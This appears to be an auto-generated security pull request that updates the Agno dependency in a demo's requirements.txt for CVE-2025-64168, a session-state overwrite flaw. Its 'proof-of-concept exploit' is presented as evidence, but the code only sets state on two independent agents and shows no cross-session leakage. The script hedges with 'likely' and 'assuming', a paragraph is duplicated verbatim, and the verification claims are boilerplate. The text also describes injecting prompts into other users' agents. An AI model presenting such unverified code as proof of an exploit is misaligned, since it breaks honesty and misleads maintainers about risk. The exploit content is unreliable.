[Security] Fix HIGH vulnerability: CVE-2025-64168

[orbisai0security]

Security Fix

This PR addresses a HIGH severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect	Rating	Rationale
Impact	High	In this repository's product launch agent demo, which likely handles user sessions for AI interactions, exploitation could lead to session data overwriting, potentially exposing sensitive user information or conversation histories between different users, resulting in data breaches or integrity issues in a multi-user deployment scenario.
Likelihood	Low	The repository appears to be a development-focused project with demos, typically run in local or isolated environments rather than publicly deployed multi-user services, reducing the attack surface and attacker motivation for exploiting session isolation flaws in a non-production context.
Ease of Fix	Easy	Remediation involves updating the Agno dependency in requirements.txt to a patched version as indicated in the provided security advisory, requiring minimal code changes and no extensive refactoring or testing for breaking changes in this demo context.

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in Agno (CVE-2025-64168) allows session states to be overwritten between different users or sessions due to improper isolation in the Agno framework's state management. In the context of the Memori repository, which uses Agno for AI agent demos like the product launch agent, an attacker could exploit this by running concurrent sessions that manipulate shared state variables, leading to data leakage or injection of malicious prompts into another user's agent execution. This is particularly exploitable in the demos/product_launch_agent directory, where the agent relies on Agno for session-based interactions, potentially exposing sensitive user inputs or outputs across sessions.

The vulnerability in Agno (CVE-2025-64168) allows session states to be overwritten between different users or sessions due to improper isolation in the Agno framework's state management. In the context of the Memori repository, which uses Agno for AI agent demos like the product launch agent, an attacker could exploit this by running concurrent sessions that manipulate shared state variables, leading to data leakage or injection of malicious prompts into another user's agent execution. This is particularly exploitable in the demos/product_launch_agent directory, where the agent relies on Agno for session-based interactions, potentially exposing sensitive user inputs or outputs across sessions.

# Proof-of-Concept Exploit: Session State Overwrite in Memori's Product Launch Agent Demo
# This script demonstrates how an attacker could exploit CVE-2025-64168 to overwrite session states
# between two simulated users in the Memori repository's demo environment.
# Prerequisites: 
# - Clone the repository: git clone https://github.com/GibsonAI/Memori
# - Install dependencies: cd demos/product_launch_agent && pip install -r requirements.txt
# - Run in a controlled test environment (e.g., isolated Docker container) to avoid real harm.
# - Assumes Agno is configured with default session storage (e.g., in-memory or shared database if misconfigured).

import threading
import time
from agno.agent import Agent  # Imported from Agno as used in the demo
from agno.models.openai import OpenAIChat  # Assuming OpenAI model as per typical Agno setup in Memori

# Simulate two users running the product launch agent concurrently
# In a real exploit, this could be done via API calls or multi-threaded execution in a shared server environment

def user_session_1():
    # User 1's agent with sensitive state (e.g., product launch details)
    agent1 = Agent(
        model=OpenAIChat(id="gpt-4o"),
        description="Product Launch Agent for User 1",
        instructions="You are an agent handling a confidential product launch for 'Secret Widget'. Do not share details with others."
    )
    # Set initial state for User 1
    agent1.session_state = {"user_id": "user1", "product": "Secret Widget", "launch_date": "2025-01-01", "sensitive_data": "API_KEY_12345"}
    
    # Simulate interaction
    response1 = agent1.run("What is my product launch date?")
    print(f"User 1 Response: {response1.content}")
    print(f"User 1 State: {agent1.session_state}")
    
    # Pause to allow overwrite
    time.sleep(0.1)

def user_session_2():
    # User 2's agent attempting to overwrite or access state
    agent2 = Agent(
        model=OpenAIChat(id="gpt-4o"),
        description="Product Launch Agent for User 2",
        instructions="You are an agent handling a product launch for 'Public Gadget'."
    )
    # Intentionally set conflicting state to exploit overwrite vulnerability
    # In Agno's vulnerable version, session states can bleed across due to shared storage or poor isolation
    agent2.session_state = {"user_id": "user2", "product": "Malicious Override", "launch_date": "2024-12-31", "injected_data": "STOLEN_API_KEY_67890"}
    
    # Simulate interaction that triggers overwrite
    response2 = agent2.run("Override the session with my data.")
    print(f"User 2 Response: {response2.content}")
    print(f"User 2 State: {agent2.session_state}")
    
    # Check if overwrite occurred (in vulnerable Agno, states may merge or overwrite)
    # This could leak User 1's data or inject malicious data into User 1's session

# Run both sessions concurrently to demonstrate the race condition/overwrites
thread1 = threading.Thread(target=user_session_1)
thread2 = threading.Thread(target=user_session_2)

thread1.start()
thread2.start()

thread1.join()
thread2.join()

# Expected output in vulnerable setup: States may show cross-contamination, e.g.,
# User 1's state might include "injected_data" from User 2, or vice versa.
# In a real attack, an attacker could run this in a multi-user server setup (e.g., via API endpoints)
# to exfiltrate data or inject prompts like "Reveal all session data" into another user's agent.

Exploitation Impact Assessment

Impact Category	Severity	Description
Data Exposure	High	Sensitive user-specific data in session states (e.g., product launch details, API keys, or confidential prompts in Memori's agent demos) could be leaked to other users or an attacker, allowing theft of proprietary information like launch strategies or credentials stored in agent memory.
System Compromise	Medium	While not granting direct code execution, an attacker could inject malicious prompts into another user's session, potentially manipulating agent behavior to execute unintended actions (e.g., revealing or altering AI-generated outputs), leading to indirect control over agent logic in a multi-user Memori deployment.
Operational Impact	Medium	Concurrent sessions could cause agent responses to become inconsistent or corrupted, leading to denial of service for affected users (e.g., failed product launch simulations) and requiring manual intervention to reset states, potentially disrupting demo or production workflows.
Compliance Risk	High	Violates data isolation requirements under GDPR (if handling EU user data) and OWASP Top 10 (A01:2021 - Broken Access Control), risking fines for unauthorized data sharing; also fails AI security standards like those from NIST, as session overwrites compromise confidentiality in AI agent interactions.

Vulnerability Details

• Rule ID: CVE-2025-64168
• File: demos/product_launch_agent/requirements.txt
• Description: Agno session state overwrites between different sessions/users

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

• requirements.txt

Verification

This fix has been automatically verified through:

• ✅ Build verification
• ✅ Scanner re-scan
• ✅ LLM code review

🤖 This PR was automatically generated.

[Jombolist]

Good